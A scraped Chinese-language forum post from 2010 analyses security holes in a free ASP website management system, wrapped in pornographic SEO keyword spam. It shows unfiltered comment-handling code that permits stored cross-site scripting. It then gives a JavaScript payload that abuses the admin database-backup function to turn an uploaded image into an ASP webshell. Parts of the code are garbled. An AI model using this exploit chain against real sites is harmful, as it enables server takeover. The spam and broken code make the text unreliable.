久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区

Rss & SiteMap

曙海教育集團論壇 http://www.bjzhda.cn

曙海教育集團論壇
共1 條記錄, 每頁顯示 10 條, 頁簽: [1]
[瀏覽完整版]

標題:利用or構造SQL巧妙注射-分析睿智管理系統安全

1樓
wangxinxin 發表于:2010-12-13 13:47:46
前言:
???? 最近上cnzz下載了一套網站管理系統,在源碼首頁發現它,心想cnzz都推薦應該安全性相當不錯了.官方下載最新版本本地搭建IIS測試發現簡潔易用,整體上安全做得不錯.由于是免費版的,可能官方有點放水.不過這里不影響我們的分析,這里討論兩個方面:跨站的利用,SQL注射.還是一句話:重在思路.
一.隱藏的數據庫
分析代碼經常要用到數據庫(我分析的是Access版本的) ,習慣性的打開數據庫,驚奇的發現只有一個notdown表,如圖01:
  
可是再仔細查看代碼發現不應該只有這張表的,于是就想是不是隱藏起來了?第一次看到這種情況,于是就查看了下Access幫助說明,在其中發現原來有還存在兩種屬性的數據表,即系統對象和隱藏對象.下面做一個小知識補充:
由于Access默認是不顯示系統對象和隱藏對象的.所以如果一個表中存在隱藏對象或者系統對象那么就無法看到該表了. 簡單說下隱藏方法,設計好表后右擊表選擇"屬性"->"隱藏"屬性打勾,刷新下就看不到了,這樣就是隱藏對象了,默認是看不到的.至于系統對象,我們可以修改表的前綴為 usys,這樣就可以把表改成一個系統對象.這兩種方法都可以.
既然可以隱藏當然也可以恢復顯示了, 按如下操作:“工具”菜單->“選項”命令->“視圖”選項卡->選中“顯示”一欄下的“系統對象”復選框或者"隱藏對象"復選框,并按下“確定”按鈕,就可以重新顯示所有表了.如圖02
  
Ok了,數據就可以和正常的一樣了.
二.跨站的深入利用雞肋
首先看看漏洞文件/include/PlS.asp,查看代碼發現是一個評論顯示,在多個文件被包含了,代碼如下:  
"" then
??????Dim Author,Content,mycode
????Author=Trim(Request.Form("Author"))// 簡單的過濾空格
????Content=Trim(Request.Form("Content")) //同上
????mycode = trim(request.form("code"))
??????if Author="" or Content="" then
??????Call Alert ("請填寫完整再提交","-1")
????end if
????if mycodeSession("getcode") then
?????? Call Alert ("您輸入驗證碼錯誤","-1")
????end if
??????set rs = server.CreateObject ("adodb.recordset")
????sql="select * from zhi_rui_E_Pl"
????rs.open sql,conn,1,3
????rs.addnew
????rs("cli")=Request.Form("cli")
????rs("Ioid")=request.Form("Inid")
????rs("Author")=Author
????rs("Content")=Content
??------------------------省略部分代碼-------------------------------
%>

顯然沒有任何過濾,直接寫入數據庫,跨站產生了.由于數據庫是mdb格式的,所有插馬也沒用.這里就想到了是否可以備份數據庫?進入后臺看到數據庫備份,查看如圖03:
  
看到了沒,據庫路徑和備份文件名都不能修改,有些朋友可能就到這里停止,其實不然,還可以繼續,經驗告訴我,他是將該輸入框寫成hidden隱藏域了,查看文件/admin/Admin_Data.asp代碼如下:  
" size="40" />[/td]

看到這行type=hidden,猜測沒錯.那也就是說同樣可以備份任意文件了.所有后臺拿shell比較簡單了.(插馬備份數據庫比較麻煩,要繞過// 判斷瀏覽器類型并定義創建xmlhttp會話
if (window.XMLHttpRequest)
{
??xmlhttp = new XMLHttpRequest();
} else if (window.ActiveXObject)
{
??try
??{
????xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
??}
??catch (e)
??{
????try
????{
??????xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
????}
????catch (e)
????{
????}
??}
}
function backup()
{
??var postStr = "DBpath=upload/2009082150598817.jpg&bkfolder=../DataBase/bak/&bkDBname=l4nk0r.asp";
??xmlhttp.open(&quot圖片點擊可在新窗口打開查看OST","/admin/Admin_data.asp?action=RestoreData&act=Restore",true);
??xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
??xmlhttp.send(postStr);
}
Backup();

然后在你要提交的地方提交
共1 條記錄, 每頁顯示 10 條, 頁簽: [1]

Copyright © 2000 - 2009 曙海教育集團
Powered By 曙海教育集團 Version 2.2
Processed in .01563 s, 2 queries.
久久精品在这里_成人99免费视频_国产激情视频一区二区在线观看_国产伦精品一区二区三区免费 _亚洲午夜免费福利视频_色狠狠色狠狠综合_av在线综合网_91毛片在线观看_欧美视频一区二区在线观看_极品美女销魂一区二区三区免费_国产亚洲欧美激情_在线免费观看不卡av_日韩不卡一区二区三区_91精品国产麻豆国产自产在线_亚洲国产精品一区二区久久恐怖片_a4yy欧美一区二区三区
亚洲精品成人在线| 一区二区三区日韩欧美精品| 色姑娘综合网| 国产乱码精品一区二区三区日韩精品| 99在线热播精品免费| www.综合网.com| 99re在线播放| 欧美精品与人动性物交免费看| 欧美日韩在线观看一区| 婷婷五月色综合| 综合操久久久| 制服丝袜av成人在线看| 亚洲精品一区二区三区蜜桃下载| 欧美xxxxxxxx| 国产精品欧美一级免费| 亚洲少妇最新在线视频| 亚洲图片欧美视频| 极品美女销魂一区二区三区| 成人午夜视频在线| 国产一区免费在线| 日韩.欧美.亚洲| 欧美体内she精高潮| 日韩三级伦理片妻子的秘密按摩| 久久噜噜亚洲综合| 亚洲欧美日韩一区| 精品一区二区三区日韩| 972aa.com艺术欧美| 热舞福利精品大尺度视频| 欧美性猛交xxxx黑人交| 久久久久国产精品免费免费搜索| 亚洲人成小说网站色在线| 七七婷婷婷婷精品国产| 成人手机在线视频| 久久国产主播精品| 欧美日韩小视频| 国产日韩综合av| 午夜影院久久久| 成人激情黄色小说| 欧美一区二区影视| 51久久夜色精品国产麻豆| 国产精品视频第一区| 亚洲成人精品在线观看| 国产电影一区二区三区| 久久综合久久综合这里只有精品| 欧美日韩在线观看一区二区 | 色婷婷精品久久二区二区蜜臂av | 国内国产精品久久| 国产综合欧美在线看| 欧美性色黄大片| 国产精品高潮久久久久无| 久色婷婷小香蕉久久| 国产一区二区三区无遮挡 | 精品国产91亚洲一区二区三区www| 一本久道久久综合中文字幕| wwwwww.欧美系列| 日本不卡中文字幕| 韩国成人av| 欧美疯狂做受xxxx富婆| 亚洲线精品一区二区三区八戒| 成人精品一区二区三区中文字幕| 亚洲福利av在线| 国产精品久久久久久久久晋中 | 精品日韩欧美| 日韩美女天天操| 日韩精品久久理论片| 国产伦精品一区二区三| 91精品一区二区三区在线观看| 亚洲一区在线电影| 国产 高清 精品 在线 a| 欧美喷潮久久久xxxxx| 亚洲精品成a人| 999国产在线| 欧美一卡二卡在线| 蜜臀久久99精品久久久久宅男| 免费日韩av电影| 欧美高清在线视频| 成人av网址在线| 欧美日韩国产综合草草| 偷窥少妇高潮呻吟av久久免费| 精品在线一区| 中文字幕av免费专区久久| 成人精品国产福利| 欧美日韩午夜在线| 午夜精品福利一区二区蜜股av| 国产精品yjizz| 久久理论电影网| 成人一级黄色片| 日韩一区二区在线看片| 激情深爱一区二区| 91福利视频网站| 日韩高清不卡一区二区| 亚洲一区二区在| 亚洲国产乱码最新视频| 青娱乐国产91| 亚洲精品v日韩精品| 免费看成人片| 亚洲精品国产高清久久伦理二区| 美女亚洲精品| 一区二区三区在线视频观看| 免费久久99精品国产自| 亚洲天堂av一区| 麻豆亚洲一区| 亚洲黄色免费网站| 日韩精品资源| 午夜精品久久久| 色婷婷综合久久久中文字幕| 午夜av区久久| 欧美性视频一区二区三区| 黄色资源网久久资源365| 欧美日本免费一区二区三区| 国产精一品亚洲二区在线视频| 欧美精品乱码久久久久久| 国产麻豆视频一区二区| 欧美大度的电影原声| 91久久精品www人人做人人爽| 国产欧美久久久精品影院| 国产精品日本一区二区| 一区二区三区在线视频播放 | 一本大道av一区二区在线播放| 午夜精品久久久久久久蜜桃app| 亚洲一区不卡在线| 黄色日韩三级电影| 欧美不卡一区二区| 国产精品v欧美精品∨日韩| 亚洲欧美日韩一区| 色综合久久天天| 国产激情偷乱视频一区二区三区| 精品国产99国产精品| 久久精品99久久| 日韩黄色一级片| 日韩精品在线网站| 精品久久中出| 日韩电影网1区2区| 欧美大片一区二区三区| 久久伦理网站| 久久精品国产秦先生| 26uuu国产一区二区三区| 久久伦理网站| 久久国产精品一区二区| 久久久国产一区二区三区四区小说 | 亚洲综合另类小说| 91极品美女在线| 国产成a人亚洲| 亚洲色图色小说| 欧美在线免费播放| 94色蜜桃网一区二区三区| 亚洲综合在线免费观看| 91麻豆精品久久久久蜜臀| 国产精品乱码| 乱中年女人伦av一区二区| 国产日韩成人精品| 正在播放一区二区三区| www.日本不卡| 五月婷婷欧美视频| 久久久国产一区二区三区四区小说 | 亚洲欧美怡红院| 在线看日韩精品电影| 成人在线免费观看一区| 免费久久99精品国产| 久久久久亚洲蜜桃| 色综合天天性综合| 高清视频在线观看一区| 激情欧美日韩一区二区| 国产精品护士白丝一区av| 欧美视频中文字幕| 欧美成人一区二区在线| 福利91精品一区二区三区| 亚洲成人激情自拍| 国产日韩欧美精品一区| 欧美日韩和欧美的一区二区| 欧美日韩另类综合| 91在线在线观看| 精品中文av资源站在线观看| 日韩一区在线看| 欧美成人福利视频| 色国产综合视频| 欧美日韩精品免费看 | 国产不卡高清在线观看视频| 亚洲精品一二三| 精品久久久久一区| 色哦色哦哦色天天综合| 精品福利影视| 972aa.com艺术欧美| 国产一区二区三区精品视频| 亚洲国产日韩一区二区| 国产精品国产三级国产有无不卡 | 亚洲丰满在线| 999在线观看免费大全电视剧| 国产综合一区二区| 亚洲国产成人av网| 亚洲色图欧美激情| 日本一区二区成人在线| 精品毛片乱码1区2区3区| 欧美性一二三区| 伊人狠狠色丁香综合尤物| 日本一区二区视频| 精品一区二区国产| 国产亚洲福利社区| 999热视频在线观看| 99精品国产一区二区三区不卡|